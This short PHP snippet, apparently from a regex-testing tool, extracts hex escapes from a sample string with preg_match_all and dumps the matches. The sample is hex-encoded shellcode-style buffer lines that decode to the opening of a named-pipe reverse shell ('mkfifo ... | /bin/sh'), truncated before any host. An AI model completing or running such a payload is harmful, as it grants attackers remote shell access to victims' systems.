$re = '/\\\\x([\w|\d]{2})/m';
$str = 'buf += b"\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x73"
buf += b"\\x35\\x35\\x20\\x30\\x3c\\x2f\\x74\\x6d\\x70\\x2f\\x73\\x61\\x6b"
buf += b"\\x6e\\x20\\x7c\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x3e"
';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);